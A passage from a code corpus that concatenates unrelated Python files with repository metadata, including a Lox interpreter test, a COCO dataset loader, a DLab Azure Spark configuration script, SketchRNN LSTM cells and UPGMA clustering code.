data1 = data1.reshape(data1.shape[0],1)
while True:
if data[i,0] !=0 and index_1==-1:
index_1 = i
pass
if data1[j,0] !=0 and index_2==-1:
index_2 = j
pass
if index_1!=-1 and index_2!=-1:
break
i-=1
j-=1
data = data[-index_1:,:]
data1 = data1[-index_2:,:]
data = data[-2000:,:]
data1= data1[-2000:,:]
x =pg.corr(x=data[:,0],y=data1[:,0])
print(x)
# print(data.tostring())
# print(data1.tostring())
# data = data[:,:]
# data1 = data1[:,:]
# data = data.reshape(data.shape[0],1)
# data1 = data1.reshape(data1.shape[0],1)
# data = data[-10000:,:]
# data1 = data1[-10000:,:]
# print(data1.shape[1])
# df = pd.DataFrame(data,data1)
# print(df.head())
# print(data1.shape)
# data = data[-5000:,:]
# data1 = data1[-5000:,:]
# #
# x =pg.corr(x=data[:,0],y=data1[:,0])
# print(x)
| 2.421875 | 2 |
tests/comments/test_only_block_comment.py | sco1/pylox | 2 | 5576 | <reponame>sco1/pylox<filename>tests/comments/test_only_block_comment.py<gh_stars>1-10
from textwrap import dedent
import pytest
from pylox.lox import Lox
TEST_SRC = dedent(
"""\
/*
This is a multiline block comment
*/
"""
)
EXPECTED_STDOUTS: list[str] = []
def test_block_comment_at_eof(capsys: pytest.CaptureFixture) -> None:
interpreter = Lox()
interpreter.run(TEST_SRC)
assert not interpreter.had_error
assert not interpreter.had_runtime_error
all_out = capsys.readouterr().out.splitlines()
assert all_out == EXPECTED_STDOUTS
| 2.46875 | 2 |
mlbase/lazy.py | n-kats/mlbase | 0 | 5577 | <reponame>n-kats/mlbase<filename>mlbase/lazy.py<gh_stars>0
from mlbase.utils.misc import lazy
tensorflow = lazy("tensorflow")
numpy = lazy("numpy")
gensim = lazy("gensim")
| 1.4375 | 1 |
setup.py | sturmianseq/observed | 33 | 5578 | import re
import setuptools
README_FILENAME = "README.md"
VERSION_FILENAME = "observed.py"
VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]"
# Get version information
with open(VERSION_FILENAME, "r") as version_file:
mo = re.search(VERSION_RE, version_file.read(), re.M)
if mo:
version = mo.group(1)
else:
msg = "Unable to find version string in %s." % (version_file,)
raise RuntimeError(msg)
# Get description information
with open(README_FILENAME, "r") as description_file:
long_description = description_file.read()
setuptools.setup(
name="observed",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="Observer pattern for functions and bound methods",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/DanielSank/observed",
py_modules=["observed"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 1.890625 | 2 |
src/coco.py | catalyst-team/detector | 15 | 5579 | import os
import json
import numpy as np
import pickle
from typing import Any
from pycocotools.coco import COCO
from torch.utils.data import Dataset
class DetectionMSCOCODataset(Dataset):
def __init__(self, annotation_file: str, image_dir: str):
self._annotation_file = annotation_file
self._image_dir = image_dir
self._cache_file = self._annotation_file + ".cache"
self._coco = COCO(self._annotation_file)
self._img_ids = self._coco.getImgIds()
self._cat_ids = self._coco.getCatIds()
self._ann_ids = self._coco.getAnnIds()
self._data = "coco"
self._classes = {
ind: cat_id for ind, cat_id in enumerate(self._cat_ids)
}
self._coco_to_class_map = {
value: key for key, value in self._classes.items()
}
self._load_data()
self._db_inds = np.arange(len(self._image_names))
self._load_coco_data()
def _load_data(self):
print("loading from cache file: {}".format(self._cache_file))
if not os.path.exists(self._cache_file):
print("No cache file found...")
self._extract_data()
with open(self._cache_file, "wb") as f:
pickle.dump([self._detections, self._image_names], f)
print("Cache file created")
else:
with open(self._cache_file, "rb") as f:
self._detections, self._image_names = pickle.load(f)
def _load_coco_data(self):
with open(self._annotation_file, "r") as f:
data = json.load(f)
coco_ids = self._coco.getImgIds()
eval_ids = {
self._coco.loadImgs(coco_id)[0]["file_name"]: coco_id
for coco_id in coco_ids
}
self._coco_categories = data["categories"]
self._coco_eval_ids = eval_ids
def class_name(self, cid):
cat_id = self._classes[cid]
cat = self._coco.loadCats([cat_id])[0]
return cat["name"]
def _extract_data(self):
self._image_names = [
self._coco.loadImgs(img_id)[0]["file_name"]
for img_id in self._img_ids
]
self._detections = {}
for ind, (coco_image_id, image_name) in enumerate(zip(self._img_ids, self._image_names)):
image = self._coco.loadImgs(coco_image_id)[0]
bboxes = []
categories = []
for cat_id in self._cat_ids:
annotation_ids = self._coco.getAnnIds(imgIds=image["id"], catIds=cat_id)
annotations = self._coco.loadAnns(annotation_ids)
category = self._coco_to_class_map[cat_id]
for annotation in annotations:
bbox = np.array(annotation["bbox"])
bbox[[2, 3]] += bbox[[0, 1]]
bboxes.append(bbox)
categories.append(category)
self._detections[image_name] = [{
'bbox': bbox.astype(np.float32),
'category_id': category,
'category_name': self.class_name(category)
} for bbox, category in zip(bboxes, categories)]
def __getitem__(self, ind: int) -> Any:
image_name = self._image_names[ind]
return {
'image_name': os.path.join(self._image_dir, image_name),
'detections': self._detections[image_name]
}
def __len__(self) -> int:
return len(self._img_ids)
def get_num_classes(self) -> int:
return len(self._cat_ids)
| 2.453125 | 2 |
UVa 10105 polynomial coefficients/sample/main.py | tadvi/uva | 1 | 5580 | import sys
import operator
sys.stdin = open('input.txt')
fact = [1, 1]
for i in range(2, 15):
fact.append(fact[-1] * i)
while True:
try:
n, k = map(int, raw_input().split())
coef = map(int, raw_input().split())
except:
break
print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
| 2.84375 | 3 |
pynotes/note/models.py | wallaceleonel/Flash-Cards | 2 | 5581 | <gh_stars>1-10
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(max_length=255,unique=True)
#meusite.com/blog;introducao-ao-django
author = models.ForeignKey(User, on_delete=models.CASCADE)
body = models.TextField()
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("-created",)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse("note:detail", kwargs={"slug": self.slug})
| 2.53125 | 3 |
infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | 0 | 5582 | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import logging
import json
import sys
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import os
import uuid
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
# generating variables dictionary
print('Generating infrastructure names and tags')
notebook_config = dict()
try:
notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-')
except:
notebook_config['exploratory_name'] = ''
try:
notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-')
except:
notebook_config['computational_name'] = ''
notebook_config['service_base_name'] = os.environ['conf_service_base_name']
notebook_config['resource_group_name'] = os.environ['azure_resource_group_name']
notebook_config['region'] = os.environ['azure_region']
notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-')
notebook_config['project_name'] = os.environ['project_name'].replace('_', '-')
notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-')
notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-')
notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \
'-de-' + notebook_config['exploratory_name'] + '-' + \
notebook_config['computational_name']
notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m'
notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s'
notebook_config['notebook_name'] = os.environ['notebook_instance_name']
notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem'
notebook_config['dlab_ssh_user'] = os.environ['conf_os_user']
notebook_config['instance_count'] = int(os.environ['dataengine_instance_count'])
try:
notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['master_node_name'])
notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['notebook_name'])
except Exception as err:
print('Error: {0}'.format(err))
sys.exit(1)
notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip'])
except Exception as err:
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to generate infrastructure names", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \
" --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\
format(notebook_config['cluster_name'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'],
notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'],
os.environ['azure_datalake_enable'], notebook_config['spark_master_ip'])
try:
local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed installing Dataengine kernels.", str(err))
sys.exit(1)
try:
logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
params = "--hostname {0} " \
"--keyfile {1} " \
"--os_user {2} " \
"--cluster_name {3} " \
.format(notebook_config['notebook_ip'],
notebook_config['key_path'],
notebook_config['dlab_ssh_user'],
notebook_config['cluster_name'])
try:
local("~/scripts/{0}.py {1}".format('common_configure_spark', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to configure Spark.", str(err))
sys.exit(1)
try:
with open("/root/result.json", 'w') as result:
res = {"notebook_name": notebook_config['notebook_name'],
"Action": "Configure notebook server"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
| 1.554688 | 2 |
pyACA/ToolFreq2Bark.py | ruohoruotsi/pyACA | 81 | 5583 | <reponame>ruohoruotsi/pyACA<filename>pyACA/ToolFreq2Bark.py<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
helper function: convert Hz to Bark scale
Args:
fInHz: The frequency to be converted, can be scalar or vector
cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller')
Returns:
Bark values of the input dimension
"""
import numpy as np
import math
def ToolFreq2Bark(fInHz, cModel = 'Schroeder'):
def acaSchroeder_scalar(f):
return 7 * math.asinh(f/650)
def acaTerhardt_scalar(f):
return 13.3 * math.atan(0.75 * f/1000)
def acaZwicker_scalar(f):
return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500)
def acaTraunmuller_scalar(f):
return 26.81/(1+1960./f) - 0.53
f = np.asarray(fInHz)
if f.ndim == 0:
if cModel == 'Terhardt':
return acaTerhardt_scalar(f)
elif cModel == 'Zwicker':
return acaZwicker_scalar(f)
elif cModel == 'Traunmuller':
return acaTraunmuller_scalar(f)
else:
return acaSchroeder_scalar(f)
fBark = np.zeros(f.shape)
if cModel == 'Terhardt':
for k,fi in enumerate(f):
fBark[k] = acaTerhardt_scalar(fi)
elif cModel == 'Zwicker':
for k,fi in enumerate(f):
fBark[k] = acaZwicker_scalar(fi)
elif cModel == 'Traunmuller':
for k,fi in enumerate(f):
fBark[k] = acaTraunmuller_scalar(fi)
else:
for k,fi in enumerate(f):
fBark[k] = acaSchroeder_scalar(fi)
return (fBark)
| 2.578125 | 3 |
magenta/models/sketch_rnn/rnn.py | laurens-in/magenta | 1 | 5584 | <reponame>laurens-in/magenta
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SketchRNN RNN definition."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.contrib import rnn as contrib_rnn
def orthogonal(shape):
"""Orthogonal initilaizer."""
flat_shape = (shape[0], np.prod(shape[1:]))
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v
return q.reshape(shape)
def orthogonal_initializer(scale=1.0):
"""Orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
return tf.constant(orthogonal(shape) * scale, dtype)
return _initializer
def lstm_ortho_initializer(scale=1.0):
"""LSTM orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
size_x = shape[0]
size_h = shape[1] // 4 # assumes lstm.
t = np.zeros(shape)
t[:, :size_h] = orthogonal([size_x, size_h]) * scale
t[:, size_h:size_h * 2] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 2:size_h * 3] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 3:] = orthogonal([size_x, size_h]) * scale
return tf.constant(t, dtype)
return _initializer
class LSTMCell(contrib_rnn.RNNCell):
"""Vanilla LSTM cell.
Uses ortho initializer, and also recurrent dropout without memory loss
(https://arxiv.org/abs/1603.05118)
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.9):
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def state_size(self):
return 2 * self.num_units
@property
def output_size(self):
return self.num_units
def get_output(self, state):
unused_c, h = tf.split(state, 2, 1)
return h
def __call__(self, x, state, scope=None):
with tf.variable_scope(scope or type(self).__name__):
c, h = tf.split(state, 2, 1)
x_size = x.get_shape().as_list()[1]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
# Keep W_xh and W_hh separate here as well to use different init methods.
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
concat = tf.concat([x, h], 1)
w_full = tf.concat([w_xh, w_hh], 0)
hidden = tf.matmul(concat, w_full) + bias
i, j, f, o = tf.split(hidden, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(new_c) * tf.sigmoid(o)
return new_h, tf.concat([new_c, new_h], 1) # fuk tuples.
def layer_norm_all(h,
batch_size,
base,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Layer Norm (faster version, but not using defun)."""
# Performs layer norm on multiple base at once (ie, i, g, j, o for lstm)
# Reshapes h in to perform layer norm in parallel
h_reshape = tf.reshape(h, [batch_size, base, num_units])
mean = tf.reduce_mean(h_reshape, [2], keep_dims=True)
var = tf.reduce_mean(tf.square(h_reshape - mean), [2], keep_dims=True)
epsilon = tf.constant(epsilon)
rstd = tf.rsqrt(var + epsilon)
h_reshape = (h_reshape - mean) * rstd
# reshape back to original
h = tf.reshape(h_reshape, [batch_size, base * num_units])
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
gamma = tf.get_variable(
'ln_gamma', [4 * num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [4 * num_units], initializer=tf.constant_initializer(0.0))
if use_bias:
return gamma * h + beta
return gamma * h
def layer_norm(x,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Calculate layer norm."""
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
x_shifted = x - mean
var = tf.reduce_mean(tf.square(x_shifted), axes, keep_dims=True)
inv_std = tf.rsqrt(var + epsilon)
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
gamma = tf.get_variable(
'ln_gamma', [num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [num_units], initializer=tf.constant_initializer(0.0))
output = gamma * (x_shifted) * inv_std
if use_bias:
output += beta
return output
def raw_layer_norm(x, epsilon=1e-3):
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
std = tf.sqrt(
tf.reduce_mean(tf.square(x - mean), axes, keep_dims=True) + epsilon)
output = (x - mean) / (std)
return output
def super_linear(x,
output_size,
scope=None,
reuse=False,
init_w='ortho',
weight_start=0.0,
use_bias=True,
bias_start=0.0,
input_size=None):
"""Performs linear operation. Uses ortho init defined earlier."""
shape = x.get_shape().as_list()
with tf.variable_scope(scope or 'linear'):
if reuse:
tf.get_variable_scope().reuse_variables()
w_init = None # uniform
if input_size is None:
x_size = shape[1]
else:
x_size = input_size
if init_w == 'zeros':
w_init = tf.constant_initializer(0.0)
elif init_w == 'constant':
w_init = tf.constant_initializer(weight_start)
elif init_w == 'gaussian':
w_init = tf.random_normal_initializer(stddev=weight_start)
elif init_w == 'ortho':
w_init = lstm_ortho_initializer(1.0)
w = tf.get_variable(
'super_linear_w', [x_size, output_size], tf.float32, initializer=w_init)
if use_bias:
b = tf.get_variable(
'super_linear_b', [output_size],
tf.float32,
initializer=tf.constant_initializer(bias_start))
return tf.matmul(x, w) + b
return tf.matmul(x, w)
class LayerNormLSTMCell(contrib_rnn.RNNCell):
"""Layer-Norm, with Ortho Init. and Recurrent Dropout without Memory Loss.
https://arxiv.org/abs/1607.06450 - Layer Norm
https://arxiv.org/abs/1603.05118 - Recurrent Dropout without Memory Loss
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90):
"""Initialize the Layer Norm LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def input_size(self):
return self.num_units
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.num_units
def get_output(self, state):
h, unused_c = tf.split(state, 2, 1)
return h
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
h, c = tf.split(state, 2, 1)
h_size = self.num_units
x_size = x.get_shape().as_list()[1]
batch_size = x.get_shape().as_list()[0]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
concat = tf.concat([x, h], 1) # concat for speed.
w_full = tf.concat([w_xh, w_hh], 0)
concat = tf.matmul(concat, w_full) #+ bias # live life without garbage.
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
concat = layer_norm_all(concat, batch_size, 4, h_size, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, h_size, 'ln_c')) * tf.sigmoid(o)
return new_h, tf.concat([new_h, new_c], 1)
class HyperLSTMCell(contrib_rnn.RNNCell):
"""HyperLSTM with Ortho Init, Layer Norm, Recurrent Dropout, no Memory Loss.
https://arxiv.org/abs/1609.09106
http://blog.otoro.net/2016/09/28/hyper-networks/
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90,
use_layer_norm=True,
hyper_num_units=256,
hyper_embedding_size=32,
hyper_use_recurrent_dropout=False):
"""Initialize the Layer Norm HyperLSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
use_layer_norm: boolean. (default True)
Controls whether we use LayerNorm layers in main LSTM & HyperLSTM cell.
hyper_num_units: int, number of units in HyperLSTM cell.
(default is 128, recommend experimenting with 256 for larger tasks)
hyper_embedding_size: int, size of signals emitted from HyperLSTM cell.
(default is 16, recommend trying larger values for large datasets)
hyper_use_recurrent_dropout: boolean. (default False)
Controls whether HyperLSTM cell also uses recurrent dropout.
Recommend turning this on only if hyper_num_units becomes large (>= 512)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
self.use_layer_norm = use_layer_norm
self.hyper_num_units = hyper_num_units
self.hyper_embedding_size = hyper_embedding_size
self.hyper_use_recurrent_dropout = hyper_use_recurrent_dropout
self.total_num_units = self.num_units + self.hyper_num_units
if self.use_layer_norm:
cell_fn = LayerNormLSTMCell
else:
cell_fn = LSTMCell
self.hyper_cell = cell_fn(
hyper_num_units,
use_recurrent_dropout=hyper_use_recurrent_dropout,
dropout_keep_prob=dropout_keep_prob)
@property
def input_size(self):
return self._input_size
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.total_num_units
def get_output(self, state):
total_h, unused_total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
return h
def hyper_norm(self, layer, scope='hyper', use_bias=True):
num_units = self.num_units
embedding_size = self.hyper_embedding_size
# recurrent batch norm init trick (https://arxiv.org/abs/1603.09025).
init_gamma = 0.10 # cooijmans' da man.
with tf.variable_scope(scope):
zw = super_linear(
self.hyper_output,
embedding_size,
init_w='constant',
weight_start=0.00,
use_bias=True,
bias_start=1.0,
scope='zw')
alpha = super_linear(
zw,
num_units,
init_w='constant',
weight_start=init_gamma / embedding_size,
use_bias=False,
scope='alpha')
result = tf.multiply(alpha, layer)
if use_bias:
zb = super_linear(
self.hyper_output,
embedding_size,
init_w='gaussian',
weight_start=0.01,
use_bias=False,
bias_start=0.0,
scope='zb')
beta = super_linear(
zb,
num_units,
init_w='constant',
weight_start=0.00,
use_bias=False,
scope='beta')
result += beta
return result
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
total_h, total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
c = total_c[:, 0:self.num_units]
self.hyper_state = tf.concat(
[total_h[:, self.num_units:], total_c[:, self.num_units:]], 1)
batch_size = x.get_shape().as_list()[0]
x_size = x.get_shape().as_list()[1]
self._input_size = x_size
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
# concatenate the input and hidden states for hyperlstm input
hyper_input = tf.concat([x, h], 1)
hyper_output, hyper_new_state = self.hyper_cell(hyper_input,
self.hyper_state)
self.hyper_output = hyper_output
self.hyper_state = hyper_new_state
xh = tf.matmul(x, w_xh)
hh = tf.matmul(h, w_hh)
# split Wxh contributions
ix, jx, fx, ox = tf.split(xh, 4, 1)
ix = self.hyper_norm(ix, 'hyper_ix', use_bias=False)
jx = self.hyper_norm(jx, 'hyper_jx', use_bias=False)
fx = self.hyper_norm(fx, 'hyper_fx', use_bias=False)
ox = self.hyper_norm(ox, 'hyper_ox', use_bias=False)
# split Whh contributions
ih, jh, fh, oh = tf.split(hh, 4, 1)
ih = self.hyper_norm(ih, 'hyper_ih', use_bias=True)
jh = self.hyper_norm(jh, 'hyper_jh', use_bias=True)
fh = self.hyper_norm(fh, 'hyper_fh', use_bias=True)
oh = self.hyper_norm(oh, 'hyper_oh', use_bias=True)
# split bias
ib, jb, fb, ob = tf.split(bias, 4, 0) # bias is to be broadcasted.
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i = ix + ih + ib
j = jx + jh + jb
f = fx + fh + fb
o = ox + oh + ob
if self.use_layer_norm:
concat = tf.concat([i, j, f, o], 1)
concat = layer_norm_all(concat, batch_size, 4, self.num_units, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, self.num_units, 'ln_c')) * tf.sigmoid(o)
hyper_h, hyper_c = tf.split(hyper_new_state, 2, 1)
new_total_h = tf.concat([new_h, hyper_h], 1)
new_total_c = tf.concat([new_c, hyper_c], 1)
new_total_state = tf.concat([new_total_h, new_total_c], 1)
return new_h, new_total_state
| 2.21875 | 2 |
src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | 0 | 5585 | # usr/bin/env python
"""Functions to cluster using UPGMA
upgma takes an dictionary of pair tuples mapped to distances as input.
UPGMA_cluster takes an array and a list of PhyloNode objects corresponding
to the array as input. Can also generate this type of input from a DictArray using
inputs_from_dict_array function.
Both return a PhyloNode object of the UPGMA cluster
"""
import numpy
from numpy import argmin, array, average, diag, ma, ravel, sum, take
from cogent3.core.tree import PhyloNode
from cogent3.util.dict_array import DictArray
__author__ = "<NAME>"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["<NAME>", "<NAME>", "<NAME>"]
__license__ = "BSD-3"
__version__ = "2020.7.2a"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
numerictypes = numpy.core.numerictypes.sctype2char
Float = numerictypes(float)
BIG_NUM = 1e305
def upgma(pairwise_distances):
"""Uses the UPGMA algorithm to cluster sequences
pairwise_distances: a dictionary with pair tuples mapped to a distance
returns a PhyloNode object of the UPGMA cluster
"""
darr = DictArray(pairwise_distances)
matrix_a, node_order = inputs_from_dict_array(darr)
tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM)
index = 0
for node in tree.traverse():
if not node.parent:
node.name = "root"
elif not node.name:
node.name = "edge." + str(index)
index += 1
return tree
def find_smallest_index(matrix):
"""returns the index of the smallest element in a numpy array
for UPGMA clustering elements on the diagonal should first be
substituted with a very large number so that they are always
larger than the rest if the values in the array."""
# get the shape of the array as a tuple (e.g. (3,3))
shape = matrix.shape
# turn into a 1 by x array and get the index of the lowest number
matrix1D = ravel(matrix)
lowest_index = argmin(matrix1D)
# convert the lowest_index derived from matrix1D to one for the original
# square matrix and return
row_len = shape[0]
return divmod(lowest_index, row_len)
def condense_matrix(matrix, smallest_index, large_value):
"""converges the rows and columns indicated by smallest_index
Smallest index is returned from find_smallest_index.
For both the rows and columns, the values for the two indices are
averaged. The resulting vector replaces the first index in the array
and the second index is replaced by an array with large numbers so that
it is never chosen again with find_smallest_index.
"""
first_index, second_index = smallest_index
# get the rows and make a new vector that has their average
rows = take(matrix, smallest_index, 0)
new_vector = average(rows, 0)
# replace info in the row and column for first index with new_vector
matrix[first_index] = new_vector
matrix[:, first_index] = new_vector
# replace the info in the row and column for the second index with
# high numbers so that it is ignored
matrix[second_index] = large_value
matrix[:, second_index] = large_value
return matrix
def condense_node_order(matrix, smallest_index, node_order):
"""condenses two nodes in node_order based on smallest_index info
This function is used to create a tree while condensing a matrix
with the condense_matrix function. The smallest_index is retrieved
with find_smallest_index. The first index is replaced with a node object
that combines the two nodes corresponding to the indices in node order.
The second index in smallest_index is replaced with None.
Also sets the branch length of the nodes to 1/2 of the distance between
the nodes in the matrix"""
index1, index2 = smallest_index
node1 = node_order[index1]
node2 = node_order[index2]
# get the distance between the nodes and assign 1/2 the distance to the
# lengthproperty of each node
distance = matrix[index1, index2]
nodes = [node1, node2]
d = distance / 2.0
for n in nodes:
if n.children:
n.length = d - n.children[0].TipLength
else:
